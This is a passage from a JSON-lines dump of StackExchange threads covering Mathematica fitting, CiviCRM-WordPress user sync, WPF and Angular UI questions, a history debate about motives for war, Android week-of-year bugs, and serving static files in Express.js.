multiplied by <code>10<\/code>). <code>LHdyanmicrange<\/code> is a <code>ListLogLinearPlot<\/code> of <code>pointsLHTL<\/code> as I want the x-axis to be under Log scale as well (natural in this case).\nHowever, my fitting curve <code>Lm<\/code> and its plot <code>Lmplot<\/code> does not account for the Log values as shown in <code>LHdynamicrange<\/code>. How can I adjust my <code>Lmplot<\/code> or <code>Lm<\/code> so that it incorporates the Log scale similar to <code>LHdynamicrange<\/code> when I <code>Show<\/code> both of them on the same plot?\nThanks\nAnswer: The problem is that you are evaluating <code>Log<\/code> on all elements of <code>pointsLHTL<\/code>, not just the <code>x<\/code> values. The <code>y<\/code> values are negative so the <code>Log<\/code> is imaginary.\n<code>Lm = LinearModelFit[pointsLHTL \/. {x_, y_} :> {Log@x, y}, x, x]\n\nLmplot = \n Plot[Lm[x], {x, -16, -14}, PlotStyle -> Directive[Blue, Dashed], \n PlotLegends -> {\"Linear fit\"}]\n\nShow[Lmplot, LHdynamicrange]\n<\/code>\nComment: I technically want the x-axis to be showing the pre-Log values but I can fix that by simply doing `Show[LHdynamicrange,Lmplot]` instead. Thanks, this is what I'm looking for.\nComment: @kowalski You are welcome. Thanks for the accept.\n","meta":{"source":"mathematica.stackexchange","title":"Making LinearModelFit account for Log on the x-axis","dup_signals":{}},"subset":"stackexchange"} +{"text":"Multiple contact entries created for WordPress users if they login with non-primary email addresses\n\nQuestion: We are running WordPress 4.4.2, CiviCRM 4.6.12, and the CiviCRM WordPress Member Sync and CiviCRM WordPress Profile Sync plugins.\nWhenever someone logs in with a WordPress user ID \/ email that is not their primary CiviCRM contact email, a new CiviCRM contact is created. The WP email may be listed as their \"home\" \/ \"work\" \/ \"billing\" \/ etc. email in CiviCRM but a new contact is still created. \nIn the newly created CiviCRM contact, the email address is set as \"home\" and \"primary\". The next time they login, a new contact is created, again with the email set as \"home\". We end up with a lot of duplicate contacts!\nIs this a plugin issue, or a CiviCRM issue?\nIt seems similar to the question here: Wordpress duplicates my contacts\nComment: OK with further investigation, I think I've discovered the problem. When a Wordpress User is deleted, the WP User ID is not deleted from that contact's CiviCRM contact record. Then, when a new WP User is added with the same email address as before, it is not linked to their CiviCRM contact record because there is already a WP User ID linked to it. A new CiviCRM Contact record is created each time that user logs in. I solved the issue by going to the wp_user table in the database and changing the WP user ID back to the original ID (the one linked to in the CiviCRM contact record).\nComment: From which admin page are you deleting the Users? This sounds like a CiviCRM integration bug if it doesn't also delete the `uf_match` entry\nComment: How is the mismatch happening? Are you changing the email address of the contacts in question to something other than \"primary\" in CiviCRM?\nComment: Sorry, I don't understand what you mean. Yes, the email addresses used in WordPress may not be their \"primary\" CiviCRM address. So I guess the answer is to make sure that the primary email addresses are consistent? However that doesn't explain why they continue to get more duplicate entries.\nComment: If the email used in WordPress is different to the primary email in CiviCRM, then uf_match considers them to be different users. Hence the \"duplication\", whether the sync happens via the CiviCRM plugin or one of my plugins.\nComment: But then why does it keep happening? Surely once there are two entries, the new one with the email as \"primary\" and the original\/older one with it as \"work\"\/\"home\"\/etc. and not primary, there shouldn't be any more created?\nComment: Please post the steps to reproduce your duplication scenario. Without those steps I'm as much in the dark as you are!\nComment: A solution would be not to delete WP Users but I do this when they want to change their username.\nAnswer: The issue outlined in the question and comments doesn't exist in the latest version of CiviCRM. Penny mentions that the issues results because \"When a Wordpress User is deleted, the WP User ID is not deleted from that contact's CiviCRM contact record\". \nI tested that this is no longer the case by creating a WordPress user, running <code>SELECT * from civicrm_uf_match<\/code> to find the corresponding entry in that table, then deleting the WordPress user. When I re-ran the SQL statement, I saw that the <code>civicrm_uf_match<\/code> entry was gone.\nAnswer: Certainly with Drupal, the user account is linked to the civi record via a table called uf_match. That table contains primary email address, drupal user id and civicrm contact id (and other fields not relevant to this question). It is that table that is checked to see if a record already exists for such a user. So it sounds like this would be an extra feature requirement for civi, and i have no idea how complex, so can't be more helpful at this point.\n","meta":{"source":"civicrm.stackexchange","title":"Multiple contact entries created for WordPress users if they login with non-primary email addresses","dup_signals":{}},"subset":"stackexchange"} +{"text":"How to get always the same instance of UserControl loaded via DataTemplate?\n\nQuestion: One ContentControl is used to load one of two UsersControls in resources via datatemplate.\nIt works fine but the constructor of every usercontrol is always called when navigating between them. How can I load always the same instance of the usercontrol (one instance for UserControl1 and one instance for Usercontrol2). I know that the tabcontrol can achieve that but how I can do it in my scenario without tabcontrol.\nResources:\n<code><UserControl.Resources>\n <DataTemplate x:Key=\"UserControl1\">\n <local:UserControl1 \/>\n <\/DataTemplate>\n <DataTemplate x:Key=\"UserControl2\">\n <local:UserControl2 \/>\n <\/DataTemplate>\n<\/UserControl.Resources>\n<\/code>\nContentControl:\n<code><ContentControl x:Name=\"ContentControl\" Background=\"White\">\n <ContentControl.Style>\n <Style TargetType=\"ContentControl\">\n <Style.Triggers>\n <DataTrigger Binding=\"{Binding CurrentView, \n ElementName=UserControl1}\" Value=\"UserControl1\">\n <Setter Property=\"ContentTemplate\" Value=\"{StaticResource UserControl1}\" \/>\n <\/DataTrigger>\n <DataTrigger Binding=\"{Binding CurrentView, ElementName=UserControl2}\" Value=\"UserControl2\">\n <Setter Property=\"ContentTemplate\" Value=\"{StaticResource UserControl2}\" \/>\n <\/DataTrigger>\n <\/Style.Triggers>\n <\/Style>\n <\/ContentControl.Style>\n<\/ContentControl>\n<\/code>\nAnswer: \nHow can I load always the same instance of the usercontrol\n\nYou should not be concerned about that. There's nothing in your post that explains why you are concerned about the constructor being called multiple times, but that should be a complete non-issue. If it's an issue, then you have something wrong with your design.\n\"View\" objects, such as windows, user controls, and indeed every <code>UIElement<\/code> that goes into presenting the program's state to the user, should not have any operations within them except that strictly needed to present the state to the user. WPF will instantiate and discard your specific instances as needed to handle the current state of the program. If it's in any way a problem for more than one instance of a user control to exist at a time, or for more than one instance to be created and\/or discarded over the course of running the program, then the design of the program is fundamentally broken and should be fixed.\nIf you run into any problems trying to accomplish that, of course feel free to post a question about that. Be sure to include a good Minimal, Reproducible Example, along with any details about what specifically you need help with.\nAnd of course, to start with, you should read everything you can find on the MVVM design pattern, if you haven't already. WPF has a steep learning curve when using the framework correctly, but it's even harder to use when you're not using it correctly.\nAnswer: \nHow can I load always the same instance of the usercontrol (one instance for UserControl1 and one instance for Usercontrol2)\n\nYou can hold the instances as Resources and host them inside a ContentPresenter, instead of creating a new instance everytime the DataTemplate is used:\n<code><UserControl.Resources>\n <local:UserControl1 x:Key=\"UserControl1Instance\" \/>\n <local:UserControl2 x:Key=\"UserControl2Instance\" \/>\n\n <DataTemplate x:Key=\"UserControl1\">\n <ContentPresenter Content=\"{StaticResource UserControl1Instance}\" \/>\n <\/DataTemplate>\n <DataTemplate x:Key=\"UserControl2\">\n <ContentPresenter Content=\"{StaticResource UserControl2Instance}\" \/>\n <\/DataTemplate>\n<\/UserControl.Resources>\n\n<\/code>\n","meta":{"source":"stackoverflow","title":"How to get always the same instance of UserControl loaded via DataTemplate?","dup_signals":{}},"subset":"stackexchange"} +{"text":"how to open and close dialog from a specific position?\n\nQuestion: In my angular project i have a popup dialog open, the thing is i want the dialog to popup from the button and closes inside the button as this example shows : https:\/\/material.angularjs.org\/latest\/demo\/dialog\nopen from and close to\nHow can i do it ?\nThis is my code, it just open the popup from the center of the page:\n<code> dialogAdp() {\nconst dialogRef = this.dialog.open(DialogAdpComponent, {\n width: 'auto',\n data: { incomplete: true },\n disableClose: true\n});\n\ndialogRef.afterClosed().subscribe(result => {\n this.iD = result;\n});\n }\n<\/code>\nany help pls.\nAnswer: It was just out of curiosity, with this method you can achieve a similar effect like in You example:\n<code>const dialogRef = this.dialog.open(LoginDialogComponent, {\n width: '320px',\n });\n let center = (window.innerWidth \/ 2) - 160;\n let yu = 0\n dialogRef.updatePosition({left: '0px'})\n const interv = setInterval(() => {\n if (center > yu) {\n yu += 20;\n dialogRef.updatePosition({ left: (yu) + 'px' })\n } else {\n clearInterval(interv);\n center = window.innerWidth;\n }\n });\n\n dialogRef.beforeClosed().subscribe(() => {\n yu = 0\n const interv = setInterval(() => {\n if (center > 0) {\n yu -= 15;\n dialogRef.updatePosition({ right: (yu) + 'px' })\n } else {\n clearInterval(interv);\n center = window.innerWidth;\n }\n });\n })\n<\/code>\nRemove dialogRef.beforeClose from opne dialog metod,\nand adding to close method in Dialog Component result is the same\n<code>onNoClick(): void {\n const elemRect = this.dialogRef._containerInstance['_elementRef']\n let yu = elemRect.nativeElement.offsetLeft;\n const interv = setInterval(() => {\n if (yu > - 160) {\n yu -= 10;\n this.dialogRef.updatePosition({ right: (yu) + 'px' })\n \n } else {\n clearInterval(interv);\n this.dialogRef.close();\n }\n });\n }\n<\/code>\ndialogref have updateSize option that is posible change dimension on close.\nFor Fun\nAnswer: Currently the MatDialog API doesn't expose any way to achieve this. The animations are not defined in their .scss files but in .ts files, so you won't be able to override it either. Your best bet would be creating your own custom Dialog using angular-cdk overlay (or you could try creating an issue on the material github, but odds of it being implemented any time soon would be slim).\nThere are different methods of creating custom overlay components, and the implementation is long so I won't dive into that here - but googling \"cdk overlay dialog\" should give you an idea of how this can be done.\n","meta":{"source":"stackoverflow","title":"how to open and close dialog from a specific position?","dup_signals":{}},"subset":"stackexchange"} +{"text":"Examples of wars without power as a motive\n\nQuestion: I'm more of a social historian than military historian, but if I understand correctly war between two factions is almost always a struggle for power.\nIs that the case? Are there examples of wars started for other reasons?\nEdit:\nThere were some comments about the vagueness of the term power so I'm going to try to be more specific about it. By 'struggle for power', I mean:\n\na struggle for more energy, as in actual physical energy in some form\n\nI understand that this sounds even more vague than the term power itself, but that's exactly the point of the question. I wonder if you can reduce human conflict to power conflict.\nComment: Exactly what do you mean by \"power\"? It is a term so vague that any motive for war could be framed as some form of \"power struggle\".\nComment: One theory is that in Malthusian terms since you cannot produce more land, war is always about grabbing land to increase productivity. Nowadays of course land could be translated as other resources as well, such as oil.\nComment: It might be more illuminating if you try to phrase this question in terms of counterexamples. What kind of motivations would, in your estimation, **not count** as \"power\" (or \"physical energy\" in the edit)?\nComment: Power:\n1) political or national strength\n2) the possession of control or command over others; authority; ascendancy:\n3) great or marked ability to do or act; strength; might; force\n\nPretty specific term, actually.\nComment: @CanadianCoder Not really, no. Is raiding someone for loot \"power\"? Forcing them to convert to your religion or system of government? What do you mean by \"strength\", \"control\", or \"act\"?\nComment: The word \"power\" is simply not specific at all. You can interpret it to mean just about *anything*. Consequently you can very well interpret all wars to be \"motivated\" by \"power\", but that not a valuable insight at all.\nComment: It does mean a very specific and easily identifiable thing, but that very specific thing happens to be a super-class of many sub-motivations. If I call an animal an animal, you know what I mean, you just don't know as much if I call the animal a dog. So if all wars are about power, that tells us something important, but not everything, about people.\nComment: This is a vague question. The Trojan War was to rescue Helen!\nComment: OT: I misread _\"Examples of **cars** without power as a motive\"_ and I was all like \"WAT?!\"\nComment: @CanadianCoder Caveat: I don't mean this as an insult, or personal bash, really I don't. But. Several users, regular users as well, all questioned your use of a word. You have come back saying, essentially, \"it means what it means, don't you get it?\" At that point, I might suggest you revisit your question and attempt to reword it in a way that the people who spend quite a lot of time here curating agree is useful.\nComment: I don't mean to come across as argumentative, and I guess I have less cred due to less rep, but I wrote the question exactly how I intended to write it. If the problem is being more specific about what I mean by power, I can edit the question, but I thought the definition of the word 'power' was pretty clear. If the problem is the use of the word power at all, I disagree with the issue.\nComment: Note that I never mentioned reputation. There is a commenter here, in fact, who has a fairly high reputation number, but his credibility is not what it _should_ be. :) Not naming names. I simply meant that instead of telling all of \"us\" we are wrong in thinking you use of the word power might'n't have been appropriate, maybe choose a synonym, **or** be more explicit in your question's descriptive narrative.\nComment: I've edited the question. Thanks for the comments : - )\nComment: I'm afraid the edit makes it less clear for me - what is \"physical energy\"? I don't understand that at all. Are you exploring the \"it's all about the oil\" thesis?\nComment: That's a good point. I'll have to give that one some thought.\nComment: I don't really know how I can make this question any more clear, outside of giving an arbitrary number of examples. Might as well just close it.\nAnswer: Treaties sometimes obligate nations to go to war. One example is the Theater War between Denmark-Norway and Sweden in 1788. Sweden made an unprovoked attack on Russia. Russia began to demand that Denmark-Norway to invade Sweden, as was stipulated in a 1773 treaty.\nBy the time a statement of neutrality had been issued, several thousand soldiers had died. This war had no real effect on the balance of power between the two combatants; the war was really just about Denmark-Norway honoring the terms of its treaty with Russia.\nOf course, why had Denmark-Norway signed this treaty with Russia in the first place? Well, that certainly had something to do with power. It's an issue of ultimate versus proximate causes.\nThere are also those who consider some wars to be domestic diversions. However, even if domestic concerns were something of a factor in the decision to go to war, it would be hard to believe that power considerations were irrelevant to the decision as well.\nComment: Even the example you give _could_ be construed to have been 'power' based. Russia used its diplomatic 'power' to enforce the treaty. If it didn't have some form of power backing it, then Denmark and Norway could have (diplomatically) said lump it.\nComment: @CGCampbell: Reputation is relevant here. If Denmark-Norway says \"lump it,\" then other countries would take Denmark-Norway's word less seriously in the future. So Russia doesn't necessarily enter into the equation. But I don't know enough about the case at hand to say whether the explanation here is more reputation or power.\nAnswer: When I was in college during the last millennium, there was a standard text on this. I believe it was \"Why Nations Go to War\" by Stoessinger; things may have changed in the new millennium. IO9 provides a traditional top 10 list, which is worth what you pay for it.\nAs the comments have pointed out \"power\" is a weasely word that can be construed to mean anything- kind of like the ultimate cause of death is heart failure, it is fair to retro-fit \"power\" to any conflict. \nYou've also used the term \"factions\" rather than \"nations\"; I'm not sure why, but let's assume that you want to include civil wars. \nAnd finally, why people go to war is often not the reasons they state. The grade school narrative today is that the US Civil War was about slavery, but I think a responsible historical analysis would have to include conflicts that began before the Constitutional convention and that might include differing economic systems (and mutual contempt for one another's economic systems), differing alliances (and mutual contempt thereof), differing agendas (and mutual contempt), etc. Culture, tradition, and isolation all played a part; fundamentally they had divergent, incompatible visions for the future. If I wanted to, I can make the argument that the two factions went to war over the power to determine their own futures, but I don't think that would help me to understand why these two factions went to war.\nThe other weakness with the \"power\" thesis is that it doesn't help us to predict. What was it that finally forced faction X over the edge from resistance and debate to war? There are endless pages written on the significance of the Archduke Ferdinand to the start of WWI. (I don't know if it is true, but I'm told more people went to the assassin's funeral than the Archduke's.)\nMatter of fact, WWI might be the counterexample you're looking for. I think the general consensus (with much debate) is that none of the players wanted war, but they all made commitments that wound up making it easier to participate in war than to avoid war. From that standpoint, WWI was not about power.\nThe Revolutionary war would be another good case study; neither side wanted a war. Neither side wanted \"power\". You could force fit the situation to claim that the Colonials wanted the power of self-determination and Parliament wanted the power of taxation, but I don't think that is a useful framework.\nOP has edited the question to emphasize power as \"energy\" - energy was not involved in the start of any of the three wars I've discussed. (the case for backfitting energy into the any of these is even weaker than the case for power).\nFinal comment; there are an infinite number of analytic frameworks one can use to study history. The measure of a good analytical framework is not whether you can or cannot fit examples to the theory, but rather whether the framework improves the understanding. Does it have predictive power? does it help to isolate the critical factors from other factors which are present?\nI doubt that either \"power\" or \"energy\" provide these properties.\nComment: Nice answer. Although, I think that the concept of power is definitely predictive. The question isn't whether it's predictive, but whether it's predictive with complete accuracy, and what the other factors are.\nComment: WWI wasn't so much about nobody wanted or not wanted the war, it was about \"Germans couldn't afford to shoot second, so they HAD to shoot first\" (basically, to pre-empt Russian mobilization and entry into Eastern front before Germany knocked out France).\nAnswer: In one of the pacific islands colonized by the Germans, one tribesmen accidentally killed a member of another tribe at a wedding with guests from all the appox 12 tribes on the island. The result was an every tribe v. Every other tribe in a 10 year civil war until the Germans kidnapped all the chiefs and threatened to kill them until there was peace. The civil war was not about one tribe conquering the other but soley about rrvenge\n.\n","meta":{"source":"history.stackexchange","title":"Examples of wars without power as a motive","dup_signals":{}},"subset":"stackexchange"} +{"text":"Column header size when exporting radgrid to PDF\n\nQuestion: I have a radgrid with autogenerated columns which should be exported to PDF, but when I export the grid when it contains many columns, the headers overlap each other. I want to control the size of the header text font.\nAnswer: Add this to the exporting command:\n<code>GridColumn column = RadGrid1.MasterTableView.GetColumn(\"Phone\");\ncolumn.HeaderStyle.Width = Unit.Pixel(80);\nRadGrid1.MasterTableView.ExportToPdf();\n<\/code>\n","meta":{"source":"stackoverflow","title":"Column header size when exporting radgrid to PDF","dup_signals":{}},"subset":"stackexchange"} +{"text":"Wrong \"week of year\" in Android\n\nQuestion: The number of \"week of year\" returned from a Date is wrong.\nThis is my code:\n<code>Calendar c = Calendar.getInstance();\nc.setTime(my_date);\nint num_week = c.get(Calendar.WEEK_OF_YEAR);\n<\/code>\nIf my_date (type Date) is 01\/01\/2011, I supposed that \"week of year\" is 1. But it returned 52.\nI try to test with these methods but I don't obtain anything:\n<code>c.setFirstDayOfWeek(6);\nc.setMinimalDaysInFirstWeek(1)\n<\/code>\nIf It's interesting, I'm from Spain, and our week begin on Monday.\nHave I to do anything for obtain right results?\nThanks!\nComment: possible duplicate of [Why dec 31 2010 returns 1 as week of year?](http:\/\/stackoverflow.com\/questions\/4608470\/why-dec-31-2010-returns-1-as-week-of-year)\nComment: The first and last week of the year are dependent on locale - see link above for a duplicate question and explanation.\nComment: @Metro: But setting the minimal number of days of the first week to 1 *should* fix it regardless.\nAnswer: This may be Android\/Harmony-specific. For example, this works for me with desktop Java:\n<code>import java.util.*;\n\npublic class Test {\n public static void main(String[] args) {\n Calendar calendar = Calendar.getInstance();\n calendar.set(2011, 0, 1, 0, 0, 0);\n System.out.println(calendar.get(Calendar.WEEK_OF_YEAR)); \/\/ Prints 52\n calendar.setMinimalDaysInFirstWeek(1);\n System.out.println(calendar.get(Calendar.WEEK_OF_YEAR)); \/\/ Prints 1\n }\n}\n<\/code>\nCan you confirm that the exact same code (modulo logging options) logs 52 twice on Android?\nComment: What happens with: `Calendar.getInstance(Locale.SPAIN)`?\nComment: @Metro: With `new Locale(\"es\")` I get 1 both times. With `new Locale(\"es\", \"ES\")` I get 52 and 1.\nComment: Interesting. I'm curious to see if this is Android specific.\nComment: Got curious and ran your sample code against every available locale on Android 2.3. All values returned incorrectly with 52\/52. Then ran against Android 3.2. All locales except \"fa_x\" and most of \"ar_x\" again returned incorrectly with 52\/52 (fa_x, ar_x returned 1\/1).\nComment: @Metro: Thanks for the testing. Curious. Have you tried the Apache Harmony project on a desktop?\nComment: I am completely new with the Java platform; just trying to make a cross-over to developing Android apps. The Apache Harmony project is above my pay-grade.\nComment: @Metro: Fair enough - thanks for the Android testing anyway :)\nComment: Thank you!\nNow It seems it work. I use:\n Calendar c = Calendar.getInstance(new Locale(\"es\", \"ES\"));\n c.setMinimalDaysInFirstWeek(2);\nI test with different values of setMinimalDaysInFirstWeek, and the results for 1\/1\/2011 were:\n- Value 1: 52\n- Value 2: 1\n- Value 3: 53\n- Value 4: 52\n\nI test with 2 and It works. The only problem is that some days of last week of the year (for example 31\/12) it detects as week 1, but I show a 52 to the user.\nand\nAnswer: Here you can view the reference by oracle \nhttps:\/\/docs.oracle.com\/javase\/7\/docs\/api\/java\/util\/GregorianCalendar.html\nAnd I have placed a quick solution to find the week count of current day. You can alter and optimize as your way. Also set according to your convenient GMT value\n<code>public static int getWeeksOfMonth() {\n\n DATESTATUS = false;\n VALUESTATUS = false;\n int weekCount;\n WEEK_OF_MONTH= -1;\n\n \/\/ get the supported ids for GMT+04:00 (Pacific Standard Time)\n String[] ids = getAvailableIDs(4 * 60 * 60 * 1000);\n \/\/ if no ids were returned, something is wrong. get out.\n if (ids.length == 0)\n return WEEK_OF_MONTH;\n\n \/\/ create a Pacific Standard Time time zone\n SimpleTimeZone pdt = new SimpleTimeZone(4 * 60 * 60 * 1000, ids[0]);\n\n \/\/ create a GregorianCalendar with the Pacific Daylight time zone\n \/\/ and the current date and time\n Calendar calendar = new GregorianCalendar(pdt);\n Date trialTime = new Date();\n calendar.setTime(trialTime);\n\n weekCount = calendar.get(Calendar.WEEK_OF_YEAR);\n\n return recursiveWeekCountCheck(calendar, weekCount);\n}\n\nprivate static int recursiveWeekCountCheck(Calendar calendar, int weekCount) {\n if (calendar.get(Calendar.MONTH) == Calendar.DECEMBER && weekCount == 1) {\n DATESTATUS = true;\n calendar.add(Calendar.DAY_OF_MONTH, -1);\n weekCount = calendar.get(Calendar.WEEK_OF_YEAR);\n recursiveWeekCountCheck(calendar, weekCount);\n }\n if (!VALUESTATUS){\n VALUESTATUS = true;\n if (DATESTATUS) {\n weekCount++;\n WEEK_OF_MONTH = weekCount;\n } else {\n WEEK_OF_MONTH = weekCount;\n }\n }\n return WEEK_OF_MONTH;\n}\n<\/code>\nAt the end just call the method getWeeksOfMonth();\n","meta":{"source":"stackoverflow","title":"Wrong \"week of year\" in Android","dup_signals":{}},"subset":"stackexchange"} +{"text":"Express-js can't GET my static files, why?\n\nQuestion: I've reduced my code to the simplest express-js app I could make:\n<code>var express = require(\"express\"),\n app = express.createServer();\napp.use(express.static(__dirname + '\/styles'));\napp.listen(3001);\n<\/code>\nMy directory look like this:\n<code>static_file.js\n\/styles\n default.css\n<\/code>\nYet when I access <code>http:\/\/localhost:3001\/styles\/default.css<\/code> I get the following error:\n<code>Cannot GET \/ styles \/\ndefault.css\n<\/code>\nI'm using <code>express 2.3.3<\/code> and <code>node 0.4.7<\/code>. What am I doing wrong?\nComment: check below link http:\/\/only4ututorials.blogspot.com\/2017\/05\/how-to-serve-static-file-in-express-js.html\nAnswer: Try <code>http:\/\/localhost:3001\/default.css<\/code>.\nTo have <code>\/styles<\/code> in your request URL, use:\n<code>app.use(\"\/styles\", express.static(__dirname + '\/styles'));\n<\/code>\nLook at the examples on this page:\n<code>\/\/Serve static content for the app from the \"public\" directory in the application directory.\n\n \/\/ GET \/style.css etc\n app.use(express.static(__dirname + '\/public'));\n\n\/\/ Mount the middleware at \"\/static\" to serve static content only when their request path is prefixed with \"\/static\".\n\n \/\/ GET \/static\/style.css etc.\n app.use('\/static', express.static(__dirname + '\/public'));\n<\/code>\nComment: always use `path.join` to overcome cross platform directory separator issues. path.join(__dirname, '\/')\nComment: I put that at my code, but the browser always redirect to \"\/static\/myjs.js\/\", that last \/ give me an error of MIME Type\nComment: In case of new install you should verify that your express module is properly installed (http:\/\/expressjs.com\/en\/starter\/installing.html) then you should check the path and your directory name like Giacomo said ;)\nComment: Does the mount path make sense in `Express` in `prod` or is it a testing issue for dev? Maybe it looks more ordered to have an url folder.\nComment: If anyone using TypeScript (or not) stumbles upon this comment and has the same problem: if your file is in a `src\/` dir, use `path.join(__dirname, \"..\/public\")`.\nComment: Shouldn't app.use() without a specified path handle all requests? Then why will `app.use(express.static(__dirname + '\/public'));` not work for \/static?\nComment: oh darn, app.get doesn't work, has to be app.use\nAnswer: I have the same problem. I have resolved the problem with following code:\n<code>app.use('\/img',express.static(path.join(__dirname, 'public\/images')));\napp.use('\/js',express.static(path.join(__dirname, 'public\/javascripts')));\napp.use('\/css',express.static(path.join(__dirname, 'public\/stylesheets')));\n<\/code>\nStatic request example:\n<code>http:\/\/pruebaexpress.lite.c9.io\/js\/socket.io.js\n<\/code>\nI need a more simple solution. Does it exist?\nComment: Thank you for sharing your solution regardless of whether it is optimal or not. If you want to reopen the issue for optimization, consider posting a new question detailing the new circumstances. If optimization is the sole purpose, the question may be better suited to [SO Code Review](http:\/\/stackoverflow.com\/questions\/tagged\/code-review).\nComment: In my case, the only way to make static imports work with expressjs has been to use the \"`path`\" module. All other solutions without `path.join` or prepending the `__dirname` string have been fruitless.\nAnswer: This work for me:\n<code>app.use('*\/css',express.static('public\/css'));\napp.use('*\/js',express.static('public\/js'));\napp.use('*\/images',express.static('public\/images'));\n<\/code>\nAnswer: <code>default.css<\/code> should be available at <code>http:\/\/localhost:3001\/default.css<\/code>\nThe <code>styles<\/code> in <code>app.use(express.static(__dirname + '\/styles'));<\/code> just tells express to look in the <code>styles<\/code> directory for a static file to serve. It doesn't (confusingly) then form part of the path it is available on.\nComment: Totally! Which is by convention in express.js you do it on `\/public` which has `css`, `js`, `img` folders so you can `http:\/\/localhost:3001\/css\/default.css` :)\nAnswer: In your server.js :\n<code>var express = require(\"express\");\nvar app = express();\napp.use(express.static(__dirname + '\/public'));\n<\/code>\nYou have declared express and app separately, create a folder named 'public' or as you like, and yet you can access to these folder. In your template src, you have added the relative path from \/public (or the name of your folder destiny to static files). Beware of the bars on the routes.\nAnswer: I am using Bootstrap CSS, JS and Fonts in my application. I created a folder called <code>asset<\/code> in root directory of the app and place all these folder inside it. Then in server file added following line:\n<code>app.use(\"\/asset\",express.static(\"asset\"));\n<\/code>\nThis line enables me to load the files that are in the <code>asset<\/code> directory from the <code>\/asset<\/code> path prefix like: <code>http:\/\/localhost:3000\/asset\/css\/bootstrap.min.css<\/code>.\nNow in the views I can simply include CSS and JS like below:\n<code><link href=\"\/asset\/css\/bootstrap.min.css\" rel=\"stylesheet\">\n<\/code>\nComment: This is the answer that is well explained that worked for me. +1 for taking the pain to elaborate and give an example that works. Last time this worked for me on a previous project it was just by fluke but today as I work on another new project I understand how it works from the good explanation in your answer.\nAnswer: What worked for me is:\nInstead of writing <code>app.use(express.static(__dirname + 'public\/images'));<\/code> in your app.js\nSimply write \n<code>app.use(express.static('public\/images'));<\/code>\ni.e remove the root directory name in the path. And then you can use the static path effectively in other js files, For example: \n<code><img src=\"\/images\/misc\/background.jpg\">\n<\/code>\nHope this helps :)\nComment: This solved my issue. In my code, path to CSS was working fine even with the __dirname concatenation (using path.join), while fetching js was failing.\nAnswer: to serve static files (css,images,js files)just two steps:\n\npass the directory of css files to built in middleware express.static\n<code>var express = require('express');\nvar app = express();\n\/*public is folder in my project directory contains three folders\ncss,image,js\n*\/\n\/\/css =>folder contains css file\n\/\/image=>folder contains images\n\/\/js =>folder contains javascript files\napp.use(express.static( 'public\/css'));\n<\/code>\nto access css files or images just type in url http:\/\/localhost:port\/filename.css ex:http:\/\/localhost:8081\/bootstrap.css\n\nnote: to link css files to html just type<code><link href=\"file_name.css\" rel=\"stylesheet\">\n<\/code>\nif i write this code \n<code>var express = require('express');\nvar app = express();\napp.use('\/css',express.static( 'public\/css'));\n<\/code>\nto access the static files just type in url:localhost:port\/css\/filename.css\nex:http:\/\/localhost:8081\/css\/bootstrap.css\nnote to link css files with html just add the following line\n<code><link href=\"css\/file_name.css\" rel=\"stylesheet\"> \n<\/code>\nAnswer: this one worked for me\n<code>app.use(express.static(path.join(__dirname, 'public')));\n\napp.use('\/img',express.static(path.join(__dirname, 'public\/images')));\n\napp.use('\/shopping-cart\/javascripts',express.static(path.join(__dirname, 'public\/javascripts')));\n\napp.use('\/shopping-cart\/stylesheets',express.static(path.join(__dirname, 'public\/stylesheets')));\n\napp.use('\/user\/stylesheets',express.static(path.join(__dirname, 'public\/stylesheets')));\n\napp.use('\/user\/javascripts',express.static(path.join(__dirname, 'public\/javascripts')));\n<\/code>\nAnswer: Webpack makes things awkward\nAs a supplement to all the other already existing solutions:\nFirst things first: If you base the paths of your files and directories on the <code>cwd<\/code> (current working directory), things should work as usual, as the <code>cwd<\/code> is the folder where you were when you started <code>node<\/code> (or <code>npm start<\/code>, <code>yarn run<\/code> etc).\nHowever...\nIf you are using webpack, <code>__dirname<\/code> behavior will be very different, depending on your <code>node.__dirname<\/code> settings, and your webpack version:\n\nIn Webpack v4, the default behavior for <code>__dirname<\/code> is just <code>\/<\/code>, as documented here.\n\nIn this case, you usually want to add this to your config which makes it act like the default in v5, that is <code>__filename<\/code> and <code>__dirname<\/code> now behave as-is but for the output file:\n<code>module.exports = {\n \/\/ ...\n node: {\n \/\/ generate actual output file information\n \/\/ see: https:\/\/webpack.js.org\/configuration\/node\/#node__filename\n __dirname: false,\n __filename: false,\n }\n};\n<\/code>\n\nThis has also been discussed here.\n\nIn Webpack v5, per the documentation here, the default is already for <code>__filename<\/code> and <code>__dirname<\/code> to behave as-is but for the output file, thereby achieving the same result as the config change for v4.\n\nExample\nFor example, let's say:\n\nyou want to add the static <code>public<\/code> folder\nit is located next to your output (usually <code>dist<\/code>) folder, and you have no sub-folders in <code>dist<\/code>, it's probably going to look like this\n\n<code>const ServerRoot = path.resolve(__dirname \/** dist *\/, '..');\n\/\/ ...\napp.use(express.static(path.join(ServerRoot, 'public'))\n<\/code>\n(important: again, this is independent of where your source file is, only looks at where your output files are!)\nMore advanced Webpack scenarios\nThings get more complicated if you have multiple entry points in different output directories, as the <code>__dirname<\/code> for the same file might be different for output file (that is each file in <code>entry<\/code>), depending on the location of the output file that this source file was merged into, and what's worse, the same source file might be merged into multiple different output files.\nYou probably want to avoid this kind of scenario scenario, or, if you cannot avoid it, use Webpack to manage and infuse the correct paths for you, possibly via the <code>DefinePlugin<\/code> or the <code>EnvironmentPlugin<\/code>.\nAnswer: The problem with serving <code>__dirname<\/code> is that <code>__dirname<\/code> returns the path of the current file, not the project's file.\nAlso, if you use a dynamic header, each page will look for the static files in a different path and it won't work.\nThe best, for me, is to substitute <code>__dirname<\/code> for <code>process.cwd()<\/code> which ALWAYS donates the path to the project file.\n<code>app.use(express.static(process.cwd() + '\/public'));\n<\/code>\nAnd in your project:\n<code>link rel=\"stylesheet\" href=\"\/styles\/default.css\"\n<\/code>\nSee: What's the difference between process.cwd() vs __dirname?\nAnswer: I was using\n<code>app.use(express.static('public'))\n<\/code>\nWhen there was no file in the public folder with name <code>index.html<\/code>.\nI was getting the following error in the browser:\n\n\"Cannot GET \/\"\n\nWhen I renamed the file to 'index.html', it works fine.\nAnswer: I find my css file and add a route to it:\n<code>app.get('\/css\/MyCSS.css', function(req, res){\n res.sendFile(__dirname + '\/public\/css\/MyCSS.css');\n});\n<\/code>\nThen it seems to work.\nComment: I wouldn't recommend this approach as you should be using ExpressJS's `.use()` and `express.static()` methods to send where you are serving your files. Otherwise you'll have one of these router per file in your public directory and that's a lot of overhead to maintain.\nComment: This is a work around but I do not think it is appropriate. If you have many CSS and JS files, how can you maintain it?\nAnswer: Try accessing it with http:\/\/localhost:3001\/default.css.\n<code> app.use(express.static(__dirname + 